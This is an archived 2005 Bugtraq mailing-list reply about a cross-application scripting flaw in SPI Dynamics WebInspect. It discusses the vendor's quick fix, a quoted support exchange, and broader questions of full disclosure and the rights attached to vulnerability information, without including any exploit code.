Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re[2]: [Full-disclosure] SPIDynamics WebInspect Cross-ApplicationScripti

from [3APA3A] Network Security [Permanent Link]
Subject: Re[2]: [Full-disclosure] SPIDynamics WebInspect Cross-ApplicationScripting (XAS)
Date: Fri, 29 Jul 2005 14:04:52 +0400 
Dear DAN MORRILL,

--Wednesday, July 27, 2005, 10:08:12 PM, you wrote to 3APA3A@SECURITY.NNOV.RU:

DM> I got the official notice from SPI Dynamics to day on this issue. I am in no
DM> way slamming people at all, but the interesting response was inability to
DM> reproduce the XAS issue.

SPI  Dynamics  already  published  advisory on this issue and fixed this
vulnerability, at least partially.

Revisions:
V1.0 (July 27, 2005): Internal Release
V1.1 (July 28, 2005): Bulletin published

Full  disclosure  effectiveness is proved  again. Vulnerability known
since April was fixed in 2 days.

DM> Just a curiosity question based on the idea that we are all out there
DM> discovering things, that we will or will not give up to folks depending on
DM> what we discover. Its the inability to reproduce the issue that interests me
DM> the most, and what as a community should we do when no one else can verify
DM> our results? Well out side of providing POC code, that may or may not work.

According to reporter vendor was provided with

1. Problem description
2. PoC code
3. Screenshot
4. Example of the generated report.

You can find it on
http://www.security.nnov.ru/Fnews30.html

Last (unreplied) message sent to vendor was

-=-=-=-=-=-=-= begin quote =-=-=-=-=-=-=-

Sent: Wednesday, April 20, 2005 3:05 AM
To: Sam Shober
Subject: RE: [CAS-01370] SPI Dynamics WebInspect Cross-Application Scripting 
(XAS)

Inline.


Opening the scan data you sent on a default install of WebInspect 5.0.196 
shows how you are able to execute JavaScript in the report view and reload 
the vulnerability.htm. 


It's ok. This is a task of the PoC.

-=-=-=-=-=-=-=  end  quote =-=-=-=-=-=-=-

As  you  can  see, security company representative was able to reproduce
problem, but failed to understand what is XAS (and probably what is PoC)
and how it affects security related product's security.

I agree with reporter he did everything to make vendor to fix problem.

Should  we  also  educate  support staff of the company on how to handle
security  alerts? This time full disclosure before vendor fix was _only_
solution  and it was quite effective. Now, SPI Dynamics published e-mail
for  security  alerts and probably this e-mail will be monitored by more
qualified  staff  in  future.  Making  benefits  from the faults is best
company  can  do  in  this  case.  Customers  of  SPI  Dynamics can feel
themselves more secure. Isn't it good?

There are many interesting things about vulnerability disclosure. Vendor
coordination  is  not only. Of cause, standard in this area is required,
RFPolicy  is  good, but it has no force. Another problem with disclosure
is information rights. You may like it or not, vulnerability information
has  it's price and this price is high. It's not clear for vulnerability
researcher   how   he  can  use  his  rights  for  this  information and
how  these  rights  affect product vendor and his rights. I feel we will
have many problem with this in future.


-- 
~/ZARAZA
http://www.security.nnov.ru/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  MDKSA-2005:127 - Updated mozilla-thunderbird packages fix multiple vulnerabilities, Mandriva Security Team
Next by Date:  [Full-disclosure] Kshout Data Disclosure, group@soulblack.com.ar
Previous by Thread:  RE: [Full-disclosure] SPIDynamics WebInspect Cross-ApplicationScripting (XAS), DAN MORRILL
Next by Thread:  [Full-disclosure] [USN-153-1] fetchmail vulnerability, Martin Pitt
Indexes:  [Date] [Thread] [Top] [All Lists]